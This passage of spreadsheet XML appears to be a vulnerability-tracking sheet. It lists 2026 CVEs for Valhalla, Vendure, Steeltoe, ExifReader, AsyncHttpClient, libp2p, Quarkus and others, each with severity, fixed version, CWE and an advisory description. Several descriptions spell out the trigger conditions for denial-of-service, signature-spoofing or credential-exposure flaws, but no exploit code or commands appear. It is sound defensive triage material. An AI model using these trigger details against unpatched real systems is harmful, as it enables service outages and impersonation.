        <is>
          <t>Valhalla is an open source routing engine and accompanying libraries for use with OpenStreetMap data. In 3.7.0 and earlier, a POST request to /sources_to_targets containing an exclude_polygons ring formed by three collinear points can cause unbounded memory growth in the worker. The zero-area geometry, rather than the other request options, triggers processing in src/loki/polygon_search.cc until the process is terminated by the out-of-memory killer. A single unauthenticated request can therefore stop a public-facing worker. Other endpoints that accept exclude_polygons, including /route, were not verified as affected. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54716</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63460</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr">
        <is>
          <t>npm:vendure/core</t>
        </is>
      </c>
      <c r="M176" s="5" t="inlineStr">
        <is>
          <t>3.6.5</t>
        </is>
      </c>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>Vendure is an open-source headless commerce platform. Prior to 3.6.5, the public Shop GraphQL API allows an unauthenticated caller to supply a catastrophically backtracking pattern through StringOperators.regex. packages/core/src/service/helpers/list-query-builder/parse-filter-params.ts passes the raw pattern to the REGEXP implementation registered by packages/core/src/service/helpers/list-query-builder/list-query-builder.ts, and better-sqlite3 and sqljs evaluate it synchronously in the Node.js event loop. ShopProductsResolver.products is publicly reachable, so one nested-quantifier pattern can block request processing and make the storefront and admin API unavailable, while repeated requests can sustain denial of service. PostgreSQL and MySQL or MariaDB deployments do not execute this regular expression in the Node.js event loop. This issue is fixed in version 3.6.5.</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63460</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68523</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr">
        <is>
          <t>rust:fulgur</t>
        </is>
      </c>
      <c r="M177" s="5" t="inlineStr">
        <is>
          <t>0.19.0</t>
        </is>
      </c>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="S177"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77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68523</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68537</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr">
        <is>
          <t>rust:fulgur</t>
        </is>
      </c>
      <c r="M178" s="5" t="inlineStr">
        <is>
          <t>0.26.0</t>
        </is>
      </c>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="S178"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version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78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68537</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81481</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Filesystem access for attacker.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81481</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81515</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="inlineStr"/>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr">
        <is>
          <t>nuget:Steeltoe.Discovery.Eureka</t>
        </is>
      </c>
      <c r="M180" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. From 4.0.0 until 4.3.0, EurekaDiscoveryClient deserializes the registry response as one unit, and an unrecognized actionType or status, a non-Boolean isCoordinatingDiscoveryServer, or a nonnumeric timestamp can abort the entire response. A principal that can register or update an instance can cause all connected Steeltoe clients to receive an empty or stale instance list until the malformed registration is removed. The JsonInstanceInfoConverter, BoolStringJsonConverter, and LongStringJsonConverter parsing paths are affected. This issue is distinct from the earlier DataCenterInfo.name parsing vulnerability. This issue is fixed in version 4.3.0.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81515</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81516</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr">
        <is>
          <t>nuget:Steeltoe.Discovery.Consul</t>
        </is>
      </c>
      <c r="M181" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. From 4.0.0 until 4.3.0, ConsulDiscoveryClient constructs ConsulServiceInstance objects by parsing each registration's secure metadata with a strict Boolean conversion. A principal that can register a Consul service can supply a secure value other than true or false, causing the exception from one instance to abort construction of the entire instance list and make the targeted service undiscoverable. When GetAllInstancesAsync enumerates all services, one malformed instance can abort enumeration across every service. The outage persists until the offending registration is removed. This issue is fixed in version 4.3.0.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81516</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85128</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="inlineStr"/>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>The Choose User Role at Registration WordPress plugin before 1.3.3 does not validate the role requested at registration against the roles an administrator chose to offer, allowing unauthenticated users to request any role, including administrator, and to be granted it once the request is approved. Exploitation requires the Choose User Role at Registration WordPress plugin before 1.3.3's role selection feature and public account registration to both be enabled.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85128</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85715</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr">
        <is>
          <t>npm:exifreader</t>
        </is>
      </c>
      <c r="M183" s="5" t="inlineStr">
        <is>
          <t>4.41.1</t>
        </is>
      </c>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-789, CWE-835</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>ExifReader is a JavaScript Exif information parser. Prior to 4.41.1, ExifReader parses attacker-controlled HEIC or AVIF ISO-BMFF files in getItems() within src/image-header-iso-bmff-iloc.js and trusts iloc itemCount and extentCount values while allocating an extent object for every nested-loop iteration. When offsetSize, lengthSize, baseOffsetSize, and indexSize are zero, the extent fields consume no input bytes and the buffer offset does not advance, but the parser can still allocate up to itemCount multiplied by extentCount objects without an allocation budget. A small malicious iloc box can therefore cause hundreds of megabytes of heap growth or exhaust system memory, terminating a Node.js process and denying service to web, desktop, or mobile applications that parse untrusted images. The zero field widths are valid ISO-BMFF values indicating absent fields, so the vulnerable parser must bound work rather than relying on offset advancement. The issue is fixed in version 4.41.1.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85715</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85719</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.1.0 until 2.16.1 and 3.0.12, requests using an authenticated SOCKS proxy can expose the proxy's credentials to the origin because NettyRequestFactory and NettyRequestSender attach Proxy-Authorization without confirming that the request is being sent to an HTTP proxy. With preemptive proxy authentication, the header is attached to a plaintext HTTP request, exposing credentials such as directly reversible Basic credentials to the origin. With the default non-preemptive flow, a hostile origin can return a 407 response and ProxyUnauthorized407Interceptor sends the proxy credentials through the existing SOCKS tunnel, including NTLM, Kerberos, and SPNEGO credentials. Releases before 2.1.0 lack SOCKS proxy support. This issue is fixed in versions 2.16.1 and 3.0.12.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85719</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85721</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr">
        <is>
          <t>maven:org.asynchttpclient:async-http-client</t>
        </is>
      </c>
      <c r="M185" s="5" t="inlineStr">
        <is>
          <t>2.16.1, 3.0.12</t>
        </is>
      </c>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-409</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.0.0 until 2.16.1 and 3.0.12, automatic response decompression on the HTTP/1.1 path uses ChannelManager.newHttpContentDecompressor() to install Http1ContentDecompressor without a cumulative output-size limit. A hostile or compromised server, or an attacker who can alter a response in transit, can send a small gzip, deflate, or snappy response that expands across chunks until the client exhausts its heap and raises OutOfMemoryError; brotli and zstd are also affected when their optional codecs are present. In versions 3.0.8 through 3.0.10, the HTTP/2 decompressor is also unbounded, so switching protocols does not mitigate the issue on those releases. A limit applied to each decode call is insufficient because the response can be delivered as many small chunks, so the fixed implementation tracks total decompressed bytes for the whole response. This issue is fixed in versions 2.16.1 and 3.0.12.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85721</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85917</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Azure AI Foundry allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85917</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86038</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="inlineStr"/>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr">
        <is>
          <t>npm:@libp2p/gossipsub</t>
        </is>
      </c>
      <c r="M187" s="5" t="inlineStr">
        <is>
          <t>16.0.5</t>
        </is>
      </c>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. From 15.0.0 until 16.0.5, @libp2p/gossipsub uses the default StrictSign policy in packages/gossipsub/src/utils/buildRawMessage.ts, where validateToRawMessage verifies a signature with attacker-controlled msg.key but skips binding that key to msg.from when the claimed author is an RSA peer ID that does not inline a public key. An unauthenticated attacker can place a victim RSA peer ID in msg.from, sign the message with the attacker's private key, and supply the attacker's public key in msg.key, causing the message to be accepted and propagated as authored by the victim. Applications that trust message.from for validators, authorization, accounting, moderation, reputation, or audit logging can process attacker-controlled data under false origin attribution. The issue is fixed in version 16.0.5.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86038</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86040</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-401, CWE-770</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. Prior to 11.0.26, @libp2p/floodsub accepts unauthenticated RPC frames on /floodsub/1.0.0 through PeerStreams.attachInboundStream in packages/floodsub/src/peer-streams.ts without protobuf element limits, then processRpc and processRpcSubOpt in packages/floodsub/src/floodsub.ts synchronously process the subscriptions array without a per-frame cap. A single bounded-size frame can decode into millions of empty subscription entries that block the event loop, while hundreds of thousands of unique-topic SUBSCRIBE entries allocate PeerSet objects in this.topics that are not removed after peer removal or stop. Empty entries cause CPU exhaustion but do not grow this.topics; persistent memory growth requires unique topics. The subscription path bypasses message signature validation and the message-only processing queue, allowing a remote peer to cause sustained CPU denial of service, memory exhaustion, out-of-memory termination, and node unavailability. The issue is fixed in version 11.0.26.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86040</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87742</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in quarkus-websockets-next. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by streaming messages over a single connection faster than the application can process them. Due to unbounded message buffering and a lack of read backpressure, this rapidly exhausts heap space, leading to a java.lang.OutOfMemoryError that crashes the Java Virtual Machine (JVM).</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87742</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
